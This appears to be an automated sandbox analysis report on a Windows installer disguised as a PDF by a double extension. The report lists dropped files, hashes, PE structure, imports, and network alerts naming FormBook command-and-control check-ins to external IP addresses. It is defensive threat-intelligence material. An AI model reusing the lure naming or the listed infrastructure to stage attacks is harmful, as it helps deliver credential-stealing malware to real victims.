                                                                Preview:......JFIF.....H.H.....C.....................................%...#... , #&')*)..-0-(0%()(...C...........(...((((((((((((((((((((((((((((((((((((((((((((((((((.....................................................Z........................!..1.."AQ.2aq..#B...R...$3br.4Cs...%&5STc..6D...dt...7.'EUu....................................3........................1.!23AqQ."a#4..$B...R..D.............?..H..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):321960
                                                                Entropy (8bit):1.240482616634199
                                                                Encrypted:false
                                                                SSDEEP:768:phtcv5KE3yqV0L8Xi1Sk4gVNBo/iZcRxZq129cB/ckCkoPtvb292Qrg/Bt2bNsQe:utkxDPfCkoGBdszPmWJqU
                                                                MD5:66087BEC9068998EE8F271F0580AB3F5
                                                                SHA1:80980F5A1BD6DAF01263730273F945B031F75AE3
                                                                SHA-256:248D9672E365A5C58F1AF62BA50E7FA4BFCF518846DA63ACA19797201C9E5F44
                                                                SHA-512:046A00F3DB8C6A5C2BD71A43D13FEC6418AA0E30EA77CA12BEB082F8EDCFF9D3F31BCAD7B40A6D02722F5092215279681A96E103503063A52786314D21FE83FD
                                                                Malicious:false
                                                                Preview:...............................................................S...................................d...........................c........kY....................................................b..........~..f..............o.....................i...........................................................................................z...N...............b..............................@........................ ................;.............../..............$..........J....................I..~.......................................u........................................................................................................................+E.....................u.............j...................................a........................".................6.....4.....................................................................................................z.................P........................................................................................................
                                                                Process:C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):263192
                                                                Entropy (8bit):1.2599632446975992
                                                                Encrypted:false
                                                                SSDEEP:768:XWXGdC9WRz+JhP7he1s7N4PjZlGpwlN8HmDEh/jTqcx1uNp9ieDc0VSLrPSsGCCu:IGdVcNN49lGp5UibEBfJv
                                                                MD5:0EDAE6068FC853ECD4597C0C717729E8
                                                                SHA1:8F02F7B5B9524451D3E2FA336B898883E8707FEA
                                                                SHA-256:FA5E6764D56E5EBCB89C97A192ADF8F246D7E3C5683A5864C7A8714DD977210C
                                                                SHA-512:EF8D9006A9FC63F31F6677C6500C8C9AD13CDCF45F76AAB2EAD30CE98DD223D87782DC29869B9D3C7C0729320DF341CF25F384F0EC775A8F4EA6F5BEA101EC2D
                                                                Malicious:false
                                                                Preview:........................................................................................................................a......................f.........iU........................n..................................!................................X..................F......M...............................................7.....................l................@.........G..............I...........................................................................4..............I.............................................................................-....$......................^................................................................................................q...............s............................./........................................g...J....}.......j..........................gs.......................................L......H...........~.................L............E.........(................................................O.......................................
                                                                Process:C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):295249
                                                                Entropy (8bit):7.618032385976438
                                                                Encrypted:false
                                                                SSDEEP:6144:lr+nJ22o7DeFKasx7cmDYO/8LEe0pnwTgSySSXbreaco:lr97D+cYO0IVmgSo5co
                                                                MD5:207749EAAACDEFB73F38371149004D58
                                                                SHA1:62489495A62F1E73BE546A5C6410D78A85F23CC0
                                                                SHA-256:5BF434415EC94817697E69A40321457908E38095C947210FBAE7E94A48ED6F9C
                                                                SHA-512:79944A96F88CE41C4FEADFD6A75899096C2059CE29530B14568B1E2BF94251927FDE2FEC8E0EE46B252B7C2CD64D274F96D18B5F5519FC5075AD59D316D1A3E1
                                                                Malicious:false
                                                                Preview:...................tt........aaa..........}}}}}...g.00...l.UUUU..e....,..!.......p....33333....`..bb.##..............f.P............\................oooo..'................j.=.........................3333...gg.yy................VVV................yy...MMM....$......ssss...BB...s...................jj................J..................E.....i.h..9..}}.YY.....//...........@@@...H.................................IIIII...DD.......mm.....E.^...U......>......m...,..MMM.......................ZZZZ...............YY......W........O.........A......ss.?.........nn........777.I....gg...<.....U....!.........]........%.......;;.u.,........(... ..........ss..S..................I........ll..XXXX........................D.........LLLLLLL.....x.........GG........OOOO.)......99...................................]..................iii..........................cc..............%...................B.@@@@@@........GG..cccc..............................p.G.HHH..33..C. ..............9.........>...........^^^.....
                                                                Process:C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):455315
                                                                Entropy (8bit):1.2477113828127742
                                                                Encrypted:false
                                                                SSDEEP:1536:o/yCFoEvvG0yx5hyNnuPwAVpwtCTuOf9aSDAUg:o/2Enyx5+uPwAnwMSADAUg
                                                                MD5:761F2A757CD380F71E205335CE088495
                                                                SHA1:7E1C38708629925DF64A30EB0B722A7C44FA6150
                                                                SHA-256:56A1E386A92086888D3C0F9437CC34AACFF1AF55D59A0393EEBC220D4BC2697B
                                                                SHA-512:5DB2A3E96E93E576E861F10296DB05ED890311EE2F31D930B330DCB418246C9E3C750272CCB781811B3C8BFAD940ACAB64040F72786DE4A839C7238B984E2E02
                                                                Malicious:false
                                                                Preview:.5......................&.............................a....b.......................e.....................6..........H......................1.....a..J......................L.........................l...........a......................................I...............Y...................4...........................................w.............................................m.......D.......................(................................................................V........................................W.......................................................n.......D.....................................................................}....................................................................................................................z......................................:.....G..N:........................1............N.....................M.......................8.......................................................................Z......b...:...................
                                                                Process:C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):38
                                                                Entropy (8bit):4.006841738213845
                                                                Encrypted:false
                                                                SSDEEP:3:kQMicv7Wz+v:clvSz+v
                                                                MD5:8674B487F44FE91156094E810B1A3128
                                                                SHA1:27F1EB1FBAFFBD6AF90FD2F084081BD4A96E9498
                                                                SHA-256:4F0B489724F53D0E8C6BFE50C9EA02251EEBDD7A96855091C2F6E8768F683E5D
                                                                SHA-512:4AE1B103E5E58D5EEA6EC6DB2E4DA96557B88C32CE6860E9B2986C628DD26B95162261F33E6036388184FFA5256B45BE91BE7E8C9DA85BD5945E29F2360D19E9
                                                                Malicious:false
                                                                Preview:[parsimoniously]..Vesigia=unassessed..
                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                Entropy (8bit):7.191634712480565
                                                                TrID:
                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                File name:S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe
                                                                File size:991'098 bytes
                                                                MD5:f33b6e1067bf27d4bea237206532881e
                                                                SHA1:5602bb70d47fb5f8061688b62b6f9b3bafd1a4bc
                                                                SHA256:2ab9083b17140ee82b2d96fceecfc3ad8c286b320222b074719fe7a1852ab91a
                                                                SHA512:4bd51edf3d884ac43dac8f5f1f856020b3ebfa569754da47ce98bca18e7389ea439af3624441200ea330b9821f6596b5e433b41d6ba0397590afe95a53381280
                                                                SSDEEP:24576:oewAoAZIk1OZaFT40sBSBCbnx7eqhOxQUsHVSm:CAFLEZaChBSBCr5eqoxQhHs
                                                                TLSH:F425C006FF58C787C6EA6E7489F6B3096A2DCBC99CD38B02E64568D8F670F1874C4584
                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....oZ.................d...*.....
                                                                Icon Hash:c5cdc989d5cde097
                                                                Entrypoint:0x403359
                                                                Entrypoint Section:.text
                                                                Digitally signed:false
                                                                Imagebase:0x400000
                                                                Subsystem:windows gui
                                                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                Time Stamp:0x5A6FED2E [Tue Jan 30 03:57:34 2018 UTC]
                                                                TLS Callbacks:
                                                                CLR (.Net) Version:
                                                                OS Version Major:4
                                                                OS Version Minor:0
                                                                File Version Major:4
                                                                File Version Minor:0
                                                                Subsystem Version Major:4
                                                                Subsystem Version Minor:0
                                                                Import Hash:b34f154ec913d2d2c435cbd644e91687
                                                                Instruction
                                                                sub esp, 000002D4h
                                                                push ebx
                                                                push esi
                                                                push edi
                                                                push 00000020h
                                                                pop edi
                                                                xor ebx, ebx
                                                                push 00008001h
                                                                mov dword ptr [esp+14h], ebx
                                                                mov dword ptr [esp+10h], 0040A2E0h
                                                                mov dword ptr [esp+1Ch], ebx
                                                                call dword ptr [004080A8h]
                                                                call dword ptr [004080A4h]
                                                                and eax, BFFFFFFFh
                                                                cmp ax, 00000006h
                                                                mov dword ptr [0042A20Ch], eax
                                                                je 00007F1BB0FC7AC3h
                                                                push ebx
                                                                call 00007F1BB0FCAD75h
                                                                cmp eax, ebx
                                                                je 00007F1BB0FC7AB9h
                                                                push 00000C00h
                                                                call eax
                                                                mov esi, 004082B0h
                                                                push esi
                                                                call 00007F1BB0FCACEFh
                                                                push esi
                                                                call dword ptr [00408150h]
                                                                lea esi, dword ptr [esi+eax+01h]
                                                                cmp byte ptr [esi], 00000000h
                                                                jne 00007F1BB0FC7A9Ch
                                                                push 0000000Ah
                                                                call 00007F1BB0FCAD48h
                                                                push 00000008h
                                                                call 00007F1BB0FCAD41h
                                                                push 00000006h
                                                                mov dword ptr [0042A204h], eax
                                                                call 00007F1BB0FCAD35h
                                                                cmp eax, ebx
                                                                je 00007F1BB0FC7AC1h
                                                                push 0000001Eh
                                                                call eax
                                                                test eax, eax
                                                                je 00007F1BB0FC7AB9h
                                                                or byte ptr [0042A20Fh], 00000040h
                                                                push ebp
                                                                call dword ptr [00408044h]
                                                                push ebx
                                                                call dword ptr [004082A0h]
                                                                mov dword ptr [0042A2D8h], eax
                                                                push ebx
                                                                lea eax, dword ptr [esp+34h]
                                                                push 000002B4h
                                                                push eax
                                                                push ebx
                                                                push 004216A8h
                                                                call dword ptr [00408188h]
                                                                push 0040A2C8h
                                                                Programming Language:
                                                                • [EXP] VC++ 6.0 SP5 build 8804
                                                                Name                                  Virtual Address  Virtual Size  Is in Section
                                                                IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
                                                                IMAGE_DIRECTORY_ENTRY_IMPORT          0x84fc           0xa0          .rdata
                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE        0x50000          0x5ab18       .rsrc
                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
                                                                IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC       0x0              0x0
                                                                IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
                                                                IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
                                                                IMAGE_DIRECTORY_ENTRY_IAT             0x8000           0x2b0         .rdata
                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
                                                                IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x62a5 | 0x6400 | f4cff166abb4376522cf86cbd302f644 | False | 0.658984375 | data | 6.431390019180314 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8000 | 0x138e | 0x1400 | 2914bac53cd4485c9822093463e4eea6 | False | 0.4509765625 | data | 5.146454805063938 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xa000 | 0x20318 | 0x600 | 7d0d44c89e64b001096d8f9c60b1ac1b | False | 0.4928385416666667 | data | 3.90464114821524 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata | 0x2b000 | 0x25000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x50000 | 0x5ab18 | 0x5ac00 | 8e289f0503c71e1dae735f54bd537b3d | False | 0.3740799328512397 | data | 4.762577612489826 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x504a8 | 0x42028 | Device independent bitmap graphic, 256 x 512 x 32, image size 0 | English | United States | 0.35952525372074445
RT_ICON | 0x924d0 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 0 | English | United States | 0.3869188453803383
RT_ICON | 0xa2cf8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | United States | 0.5096473029045643
RT_ICON | 0xa52a0 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | United States | 0.6343808630393997
RT_ICON | 0xa6348 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | United States | 0.5815565031982942
RT_ICON | 0xa71f0 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 0 | English | United States | 0.6877049180327869
RT_ICON | 0xa7b78 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | United States | 0.723826714801444
RT_ICON | 0xa8420 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 0 | English | United States | 0.6359447004608295
RT_ICON | 0xa8ae8 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 0 | English | United States | 0.2725609756097561
RT_ICON | 0xa9150 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | United States | 0.4602601156069364
RT_ICON | 0xa96b8 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | United States | 0.7606382978723404
RT_ICON | 0xa9b20 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | United States | 0.34139784946236557
RT_ICON | 0xa9e08 | 0x1e8 | Device independent bitmap graphic, 24 x 48 x 4, image size 0 | English | United States | 0.39549180327868855
RT_ICON | 0xa9ff0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | United States | 0.44594594594594594
RT_DIALOG | 0xaa118 | 0xb8 | data | English | United States | 0.6467391304347826
RT_DIALOG | 0xaa1d0 | 0x144 | data | English | United States | 0.5216049382716049
RT_DIALOG | 0xaa318 | 0x100 | data | English | United States | 0.5234375
RT_DIALOG | 0xaa418 | 0x11c | data | English | United States | 0.6056338028169014
RT_DIALOG | 0xaa538 | 0x60 | data | English | United States | 0.7291666666666666
RT_GROUP_ICON | 0xaa598 | 0xca | data | English | United States | 0.5792079207920792
RT_VERSION | 0xaa668 | 0x21c | data | English | United States | 0.5314814814814814
RT_MANIFEST | 0xaa888 | 0x290 | XML 1.0 document, ASCII text, with very long lines (656), with no line terminators | English | United States | 0.5625
DLL | Import
KERNEL32.dll | SetEnvironmentVariableW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, SetCurrentDirectoryW, GetFileAttributesW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, ExitProcess, GetShortPathNameW, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalLock, GlobalUnlock, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
USER32.dll | GetSystemMenu, SetClassLongW, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, GetDC, SetTimer, SetWindowTextW, LoadImageW, SetForegroundWindow, ShowWindow, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, CreateDialogParamW, SendMessageTimeoutW, wsprintfW, PostQuitMessage
GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll | SHGetSpecialFolderLocation, ShellExecuteExW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW
ADVAPI32.dll | AdjustTokenPrivileges, RegCreateKeyExW, RegOpenKeyExW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
COMCTL32.dll | ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll | OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-25T07:09:05.328915+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.4 | 49743 | 103.83.194.50 | 80 | TCP
2024-11-25T07:09:48.405139+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49839 | 195.110.124.133 | 80 | TCP
2024-11-25T07:10:05.322973+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49875 | 104.21.95.160 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 25, 2024 07:09:03.876111984 CET | 49743 | 80 | 192.168.2.4 | 103.83.194.50
Nov 25, 2024 07:09:03.995788097 CET | 80 | 49743 | 103.83.194.50 | 192.168.2.4
Nov 25, 2024 07:09:03.996829987 CET | 49743 | 80 | 192.168.2.4 | 103.83.194.50
Nov 25, 2024 07:09:04.002588987 CET | 49743 | 80 | 192.168.2.4 | 103.83.194.50
Nov 25, 2024 07:09:04.122050047 CET | 80 | 49743 | 103.83.194.50 | 192.168.2.4
Nov 25, 2024 07:09:05.328820944 CET | 80 | 49743 | 103.83.194.50 | 192.168.2.4
Nov 25, 2024 07:09:05.328905106 CET | 80 | 49743 | 103.83.194.50 | 192.168.2.4
Nov 25, 2024 07:09:05.328915119 CET | 49743 | 80 | 192.168.2.4 | 103.83.194.50
Nov 25, 2024 07:09:05.328943968 CET | 49743 | 80 | 192.168.2.4 | 103.83.194.50
Nov 25, 2024 07:09:05.328944921 CET | 80 | 49743 | 103.83.194.50 | 192.168.2.4
Nov 25, 2024 07:09:05.328957081 CET | 80 | 49743 | 103.83.194.50 | 192.168.2.4
Nov 25, 2024 07:09:05.328990936 CET | 49743 | 80 | 192.168.2.4 | 103.83.194.50
Nov 25, 2024 07:09:05.329082966 CET | 80 | 49743 | 103.83.194.50 | 192.168.2.4
Nov 25, 2024 07:09:05.329094887 CET | 80 | 49743 | 103.83.194.50 | 192.168.2.4
Nov 25, 2024 07:09:05.329106092 CET | 80 | 49743 | 103.83.194.50 | 192.168.2.4
Nov 25, 2024 07:09:05.329125881 CET | 49743 | 80 | 192.168.2.4 | 103.83.194.50
Nov 25, 2024 07:09:05.329137087 CET | 49743 | 80 | 192.168.2.4 | 103.83.194.50
Nov 25, 2024 07:09:05.329155922 CET | 49743 | 80 | 192.168.2.4 | 103.83.194.50
Nov 25, 2024 07:09:05.329179049 CET | 80 | 49743 | 103.83.194.50 | 192.168.2.4
Nov 25, 2024 07:09:05.329191923 CET | 80 | 49743 | 103.83.194.50 | 192.168.2.4
Nov 25, 2024 07:09:05.329202890 CET | 80 | 49743 | 103.83.194.50 | 192.168.2.4
Nov 25, 2024 07:09:05.329225063 CET | 49743 | 80 | 192.168.2.4 | 103.83.194.50
Nov 25, 2024 07:09:05.329253912 CET | 49743 | 80 | 192.168.2.4 | 103.83.194.50
Nov 25, 2024 07:09:05.448561907 CET | 80 | 49743 | 103.83.194.50 | 192.168.2.4
Nov 25, 2024 07:09:05.448622942 CET | 80 | 49743 | 103.83.194.50 | 192.168.2.4
Nov 25, 2024 07:09:05.448683977 CET | 49743 | 80 | 192.168.2.4 | 103.83.194.50
Nov 25, 2024 07:09:05.448710918 CET | 49743 | 80 | 192.168.2.4 | 103.83.194.50
Nov 25, 2024 07:09:05.452786922 CET | 80 | 49743 | 103.83.194.50 | 192.168.2.4
Nov 25, 2024 07:09:05.452846050 CET | 49743 | 80 | 192.168.2.4 | 103.83.194.50
Nov 25, 2024 07:09:05.452872038 CET | 80 | 49743 | 103.83.194.50 | 192.168.2.4
Nov 25, 2024 07:09:05.452918053 CET | 49743 | 80 | 192.168.2.4 | 103.83.194.50
Nov 25, 2024 07:09:05.461153030 CET | 80 | 49743 | 103.83.194.50 | 192.168.2.4
Nov 25, 2024 07:09:05.461210012 CET | 49743 | 80 | 192.168.2.4 | 103.83.194.50
Nov 25, 2024 07:09:05.539383888 CET | 80 | 49743 | 103.83.194.50 | 192.168.2.4
Nov 25, 2024 07:09:05.539400101 CET | 80 | 49743 | 103.83.194.50 | 192.168.2.4
Nov 25, 2024 07:09:05.539469004 CET | 49743 | 80 | 192.168.2.4 | 103.83.194.50
Nov 25, 2024 07:09:05.543579102 CET | 80 | 49743 | 103.83.194.50 | 192.168.2.4
Nov 25, 2024 07:09:05.543695927 CET | 80 | 49743 | 103.83.194.50 | 192.168.2.4
Nov 25, 2024 07:09:05.543776989 CET | 49743 | 80 | 192.168.2.4 | 103.83.194.50
Nov 25, 2024 07:09:05.551943064 CET | 80 | 49743 | 103.83.194.50 | 192.168.2.4
Nov 25, 2024 07:09:05.555021048 CET | 80 | 49743 | 103.83.194.50 | 192.168.2.4
Nov 25, 2024 07:09:05.555082083 CET | 49743 | 80 | 192.168.2.4 | 103.83.194.50
Nov 25, 2024 07:09:05.555105925 CET | 80 | 49743 | 103.83.194.50 | 192.168.2.4
Nov 25, 2024 07:09:05.555154085 CET | 49743 | 80 | 192.168.2.4 | 103.83.194.50
Nov 25, 2024 07:09:05.563429117 CET | 80 | 49743 | 103.83.194.50 | 192.168.2.4
Nov 25, 2024 07:09:05.563440084 CET | 80 | 49743 | 103.83.194.50 | 192.168.2.4
Nov 25, 2024 07:09:05.563493013 CET | 49743 | 80 | 192.168.2.4 | 103.83.194.50
Nov 25, 2024 07:09:05.571763039 CET | 80 | 49743 | 103.83.194.50 | 192.168.2.4
Nov 25, 2024 07:09:05.571901083 CET | 80 | 49743 | 103.83.194.50 | 192.168.2.4
Nov 25, 2024 07:09:05.571954012 CET | 49743 | 80 | 192.168.2.4 | 103.83.194.50
Nov 25, 2024 07:09:05.580183983 CET | 80 | 49743 | 103.83.194.50 | 192.168.2.4
Nov 25, 2024 07:09:05.580315113 CET | 80 | 49743 | 103.83.194.50 | 192.168.2.4
Nov 25, 2024 07:09:05.580377102 CET | 49743 | 80 | 192.168.2.4 | 103.83.194.50
Nov 25, 2024 07:09:05.588888884 CET | 80 | 49743 | 103.83.194.50 | 192.168.2.4
Nov 25, 2024 07:09:05.589024067 CET | 80 | 49743 | 103.83.194.50 | 192.168.2.4
Nov 25, 2024 07:09:05.589080095 CET | 49743 | 80 | 192.168.2.4 | 103.83.194.50
Nov 25, 2024 07:09:05.596229076 CET | 80 | 49743 | 103.83.194.50 | 192.168.2.4
Nov 25, 2024 07:09:05.596326113 CET | 80 | 49743 | 103.83.194.50 | 192.168.2.4
Nov 25, 2024 07:09:05.596384048 CET | 49743 | 80 | 192.168.2.4 | 103.83.194.50
Nov 25, 2024 07:09:05.603482008 CET | 80 | 49743 | 103.83.194.50 | 192.168.2.4
Nov 25, 2024 07:09:05.603585005 CET | 80 | 49743 | 103.83.194.50 | 192.168.2.4
Nov 25, 2024 07:09:05.603642941 CET | 49743 | 80 | 192.168.2.4 | 103.83.194.50
Nov 25, 2024 07:09:05.610877037 CET | 80 | 49743 | 103.83.194.50 | 192.168.2.4
Nov 25, 2024 07:09:05.610979080 CET | 80 | 49743 | 103.83.194.50 | 192.168.2.4
Nov 25, 2024 07:09:05.611031055 CET | 49743 | 80 | 192.168.2.4 | 103.83.194.50
Nov 25, 2024 07:09:05.618002892 CET | 80 | 49743 | 103.83.194.50 | 192.168.2.4
Nov 25, 2024 07:09:05.618135929 CET | 80 | 49743 | 103.83.194.50 | 192.168.2.4
Nov 25, 2024 07:09:05.618308067 CET | 49743 | 80 | 192.168.2.4 | 103.83.194.50
Nov 25, 2024 07:09:05.625154972 CET | 80 | 49743 | 103.83.194.50 | 192.168.2.4
Nov 25, 2024 07:09:05.626876116 CET | 49743 | 80 | 192.168.2.4 | 103.83.194.50
Nov 25, 2024 07:09:05.749896049 CET | 80 | 49743 | 103.83.194.50 | 192.168.2.4
Nov 25, 2024 07:09:05.750046015 CET | 80 | 49743 | 103.83.194.50 | 192.168.2.4
Nov 25, 2024 07:09:05.750077009 CET | 49743 | 80 | 192.168.2.4 | 103.83.194.50
Nov 25, 2024 07:09:05.750108004 CET | 49743 | 80 | 192.168.2.4 | 103.83.194.50
Nov 25, 2024 07:09:05.752247095 CET | 80 | 49743 | 103.83.194.50 | 192.168.2.4
Nov 25, 2024 07:09:05.752301931 CET | 49743 | 80 | 192.168.2.4 | 103.83.194.50
Nov 25, 2024 07:09:05.752417088 CET | 80 | 49743 | 103.83.194.50 | 192.168.2.4
Nov 25, 2024 07:09:05.752461910 CET | 49743 | 80 | 192.168.2.4 | 103.83.194.50
Nov 25, 2024 07:09:05.757062912 CET | 80 | 49743 | 103.83.194.50 | 192.168.2.4
Nov 25, 2024 07:09:05.757119894 CET | 49743 | 80 | 192.168.2.4 | 103.83.194.50
Nov 25, 2024 07:09:05.757144928 CET | 80 | 49743 | 103.83.194.50 | 192.168.2.4
Nov 25, 2024 07:09:05.757194042 CET | 49743 | 80 | 192.168.2.4 | 103.83.194.50
Nov 25, 2024 07:09:05.761781931 CET | 80 | 49743 | 103.83.194.50 | 192.168.2.4
Nov 25, 2024 07:09:05.761843920 CET | 49743 | 80 | 192.168.2.4 | 103.83.194.50
Nov 25, 2024 07:09:05.761881113 CET | 80 | 49743 | 103.83.194.50 | 192.168.2.4
Nov 25, 2024 07:09:05.762873888 CET | 49743 | 80 | 192.168.2.4 | 103.83.194.50
Nov 25, 2024 07:09:05.766582012 CET | 80 | 49743 | 103.83.194.50 | 192.168.2.4
Nov 25, 2024 07:09:05.766640902 CET | 49743 | 80 | 192.168.2.4 | 103.83.194.50
Nov 25, 2024 07:09:05.766690016 CET | 80 | 49743 | 103.83.194.50 | 192.168.2.4
Nov 25, 2024 07:09:05.766886950 CET | 49743 | 80 | 192.168.2.4 | 103.83.194.50
Nov 25, 2024 07:09:05.771579027 CET | 80 | 49743 | 103.83.194.50 | 192.168.2.4
Nov 25, 2024 07:09:05.771636963 CET | 80 | 49743 | 103.83.194.50 | 192.168.2.4
Nov 25, 2024 07:09:05.771687984 CET | 49743 | 80 | 192.168.2.4 | 103.83.194.50
Nov 25, 2024 07:09:05.776135921 CET | 80 | 49743 | 103.83.194.50 | 192.168.2.4
Nov 25, 2024 07:09:05.776191950 CET | 49743 | 80 | 192.168.2.4 | 103.83.194.50
Nov 25, 2024 07:09:05.776283979 CET | 80 | 49743 | 103.83.194.50 | 192.168.2.4
Nov 25, 2024 07:09:05.776339054 CET | 49743 | 80 | 192.168.2.4 | 103.83.194.50
Nov 25, 2024 07:09:05.780935049 CET | 80 | 49743 | 103.83.194.50 | 192.168.2.4
Nov 25, 2024 07:09:05.781044960 CET | 80 | 49743 | 103.83.194.50 | 192.168.2.4
Nov 25, 2024 07:09:05.781090975 CET | 49743 | 80 | 192.168.2.4 | 103.83.194.50
Nov 25, 2024 07:09:05.785732031 CET | 80 | 49743 | 103.83.194.50 | 192.168.2.4
Nov 25, 2024 07:09:05.785908937 CET | 80 | 49743 | 103.83.194.50 | 192.168.2.4
